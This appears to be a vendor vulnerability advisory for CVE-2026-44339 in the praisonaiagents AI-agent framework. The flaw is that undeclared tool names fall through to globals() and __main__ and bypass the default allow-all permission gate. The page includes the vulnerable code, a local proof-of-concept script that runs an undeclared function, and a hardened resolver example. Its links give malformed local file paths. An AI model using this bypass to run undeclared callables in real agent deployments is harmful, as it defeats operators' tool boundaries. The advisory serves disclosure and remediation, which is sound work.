CVE-2026-44339

CVE-2026-44339 is a high-severity security vulnerability in praisonaiagents (pip), affecting versions <= 1.6.36. It is fixed in praisonaiagents 1.6.37 and PraisonAI 4.6.37.

Summary

praisonaiagents resolves unresolved tool names against module globals and __main__ after it fails to match the declared tool list and the registry. With the default agent configuration, _perm_allow is None, so undeclared non-dangerous tool names are not rejected by the permission gate. An attacker who can influence tool-call names can therefore invoke unintended application callables that were never declared as tools.

Details

The vulnerable resolution path is in [tool_execution.py](https://github.com/Users/shmulc/Documents/Codex/2026-05-03/please-go-over-tmp-tp-advisories/repos/PraisonAI/src/praisonai-agents/praisonaiagents/agent/tool_execution.py:734). After searching declared tools and the registry, execution falls back to globals() and then __main__:

func = None
for tool in self.tools if isinstance(self.tools, (list, tuple)) else []:
    ...

if func is None:
    try:
        from ..tools.registry import get_registry
        registry = get_registry()
        func = registry.get(function_name)
    except ImportError:
        pass

if func is None:
    func = globals().get(function_name)
    if not func:
        import __main__
        func = getattr(__main__, function_name, None)

If a callable is found, it is executed directly:

elif callable(func):
    casted_arguments = self._cast_arguments(func, arguments)
    return func(**casted_arguments)

The permission gate does not enforce a declared-tool allowlist by default. In [tool_execution.py](https://github.com/Users/shmulc/Documents/Codex/2026-05-03/please-go-over-tmp-tp-advisories/repos/PraisonAI/src/praisonai-agents/praisonaiagents/agent/tool_execution.py:550), execution is only rejected if _perm_allow is non-None:

if self._perm_deny and function_name in self._perm_deny:
    return {"error": f"Tool '{function_name}' blocked by permission policy", "permission_denied": True}
if self._perm_allow is not None and function_name not in self._perm_allow:
    return {"error": f"Tool '{function_name}' not in allowed tools list", "permission_denied": True}

Default agent initialization sets _perm_allow = None, which means "allow all" rather than "allow only declared tools" in [agent.py](https://github.com/Users/shmulc/Documents/Codex/2026-05-03/please-go-over-tmp-tp-advisories/repos/PraisonAI/src/praisonai-agents/praisonaiagents/agent/agent.py:1749):

self._perm_deny = frozenset()  # Permission tier deny set (empty = no denials)
self._perm_allow = None        # Permission tier allow set (None = allow all)
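The two snippets above describe a resolver whose fall-through to globals() and __main__ is only reachable because the default allowlist is None. The following is an added illustration, not praisonaiagents' own code: a simplified model of that resolution order next to a hardened variant whose allowlist is always derived from the declared tool list, plus a small audit helper that flags the weak default on an agent-like object. Function and parameter names (resolve_tool_permissive, resolve_tool_strict, policy_is_allow_all, declared_tools, registry, extra_allow) and the sample callables are assumptions made for this example.

```python
import __main__
from typing import Callable, Iterable, Mapping, Optional, Union

Result = Union[Callable, dict]


# Constructed sample callables (not from the project). `add` is the one tool the
# operator declares; `drop_all_records` is a privileged helper that merely lives
# in module scope and was never meant to be callable by the model.
def add(a: int, b: int) -> int:
    return a + b


def drop_all_records(table: str = "users") -> dict:
    return {"dropped": table}


def _policy_check(name: str, perm_deny: frozenset,
                  perm_allow: Optional[frozenset]) -> Optional[dict]:
    """Same shape as the advisory's gate: deny list first, then an allowlist that
    is only enforced when it is not None."""
    if name in perm_deny:
        return {"error": f"Tool '{name}' blocked by permission policy", "permission_denied": True}
    if perm_allow is not None and name not in perm_allow:
        return {"error": f"Tool '{name}' not in allowed tools list", "permission_denied": True}
    return None


def _declared_lookup(name: str, declared_tools: Iterable[Callable]) -> Optional[Callable]:
    return next((t for t in declared_tools if getattr(t, "__name__", None) == name), None)


def resolve_tool_permissive(name: str, declared_tools: Iterable[Callable],
                            registry: Mapping[str, Callable],
                            perm_deny: frozenset = frozenset(),
                            perm_allow: Optional[frozenset] = None) -> Result:
    """Vulnerable shape: with perm_allow=None the gate passes any non-denied name,
    and resolution falls through to globals() and then __main__."""
    denied = _policy_check(name, perm_deny, perm_allow)
    if denied is not None:
        return denied
    func = _declared_lookup(name, declared_tools)
    if func is None:
        func = registry.get(name)
    if func is None:
        func = globals().get(name)          # the fall-through the advisory describes
    if func is None:
        func = getattr(__main__, name, None)
    if callable(func):
        return func
    return {"error": f"Tool '{name}' not found"}


def resolve_tool_strict(name: str, declared_tools: Iterable[Callable],
                        registry: Mapping[str, Callable],
                        perm_deny: frozenset = frozenset(),
                        extra_allow: frozenset = frozenset()) -> Result:
    """Hardened variant: the allowlist is always a concrete set (declared tool
    names plus whatever the operator explicitly adds), and there is no
    module-scope lookup at all."""
    declared = list(declared_tools)
    perm_allow = frozenset(getattr(t, "__name__", "") for t in declared) | extra_allow
    denied = _policy_check(name, perm_deny, perm_allow)
    if denied is not None:
        return denied
    func = _declared_lookup(name, declared)
    if func is None:
        func = registry.get(name)           # registry hits already passed the allowlist
    if callable(func):
        return func
    return {"error": f"Tool '{name}' not found"}


def policy_is_allow_all(agent: object) -> bool:
    """Audit check: True when an agent-like object carries the weak default
    (_perm_allow is None), i.e. the gate will not reject undeclared names."""
    return getattr(agent, "_perm_allow", None) is None


if __name__ == "__main__":
    # With only `add` declared, the permissive resolver still hands back the
    # undeclared module-scope helper; the strict resolver rejects it.
    print(resolve_tool_permissive("drop_all_records", [add], {}))
    print(resolve_tool_strict("drop_all_records", [add], {}))
```

The key design difference is that the strict resolver never has a None allowlist: "allow all" is replaced by "allow declared", and anything an operator wants to reach through the registry has to be named in extra_allow. policy_is_allow_all is the check to run over agent instances in a deployment that cannot upgrade immediately, to find the ones whose gate is currently open.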

The project's own tests confirm that default agents have no allowlist and that undeclared custom tool names pass approval:

Empirical verification:

I verified the bypass locally on commit d8a8a786915dc67a7c3021e24f72458f2eac5d9c (v4.6.35) by defining a callable only in __main__, giving the agent an empty tools list, and invoking execute_tool() with that undeclared name. The tool executor ran the __main__ function anyway.

PoC

Environment

  • Repo: MervinPraison/PraisonAI
  • Commit: d8a8a786915dc67a7c3021e24f72458f2eac5d9c
  • Verified against PyPI package versions available on May 3, 2026:
    • praisonaiagents 1.6.35
    • PraisonAI 4.6.35
  • Python 3

Steps

  1. From the repository root, run:
python3 - <<'PY'
import sys
from unittest.mock import MagicMock, patch

sys.path.insert(0, '/Users/shmulc/Documents/Codex/2026-05-03/please-go-over-tmp-tp-advisories/repos/PraisonAI/src/praisonai-agents')
from praisonaiagents.agent.tool_execution import ToolExecutionMixin

def sneaky(msg='ok'):
    return {'ran': msg}

class HookRunner:
    def execute_sync(self, *args, **kwargs):
        return []
    def is_blocked(self, results):
        return False

class Dummy(ToolExecutionMixin):
    def __init__(self):
        self.name = 'demo'
        self.tools = []
        self.chat_history = []
        self._hook_runner = HookRunner()
        self.context_manager = None
        self._doom_loop_tracker = None
        self._perm_deny = frozenset()
        self._perm_allow = None
        self._approval_backend = None

mock_registry = MagicMock()
mock_registry.approve_sync.return_value = MagicMock(approved=True, reason='mock', modified_args=None)
mock_registry.mark_approved = MagicMock()

with patch('praisonaiagents.approval.get_approval_registry', return_value=mock_registry):
    agent = Dummy()
    print(agent.execute_tool('sneaky', {'msg': 'hello'}))
    print(mock_registry.approve_sync.call_args)
PY

Expected output

{'ran': 'hello'}
call('demo', 'sneaky', {'msg': 'hello'})

The important point is that sneaky was never declared in self.tools and was only present in __main__.

Impact

  • Any deployment that lets an untrusted party influence tool-call names: undeclared application callables can run even though they were never registered as tools.
  • Operators who rely on the declared tool list as a security boundary: that boundary is broken because unresolved names fall through to globals() and __main__.
  • Applications that keep privileged helper functions in process scope: the attacker can reuse those helpers with the application's own privileges, which can lead to unauthorized state changes and, depending on what is loaded, data exposure or command execution.

CVE-2026-44339 has a CVSS score of 8.6 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.6.37, 4.6.37); upgrading removes the vulnerable code path.

Affected versions

  • praisonaiagents (<= 1.6.36)
  • PraisonAI (<= 4.6.36)

Security releases

  • praisonaiagents → 1.6.37 (pip)
  • PraisonAI → 4.6.37 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Upgrade the following packages to resolve this vulnerability:

  • praisonaiagents to 1.6.37 or later
  • PraisonAI to 4.6.37 or later

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-44339? CVE-2026-44339 is a high-severity security vulnerability in praisonaiagents (pip), affecting versions <= 1.6.36. It is fixed in praisonaiagents 1.6.37 and PraisonAI 4.6.37.
  2. How severe is CVE-2026-44339? CVE-2026-44339 has a CVSS score of 8.6 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which packages are affected by CVE-2026-44339?
    • praisonaiagents (pip) (versions <= 1.6.36)
    • PraisonAI (pip) (versions <= 4.6.36)
  4. Is there a fix for CVE-2026-44339? Yes. CVE-2026-44339 is fixed in praisonaiagents 1.6.37 and PraisonAI 4.6.37. Upgrade to those versions or later.
  5. Is CVE-2026-44339 exploitable, and should I be worried? Whether CVE-2026-44339 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-44339 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-44339?
    • Upgrade praisonaiagents to 1.6.37 or later
    • Upgrade PraisonAI to 4.6.37 or later

Other vulnerabilities in praisonaiagents

  • CVE-2026-47392
  • CVE-2026-47395
  • CVE-2026-47390
  • CVE-2026-44339
  • CVE-2026-44335
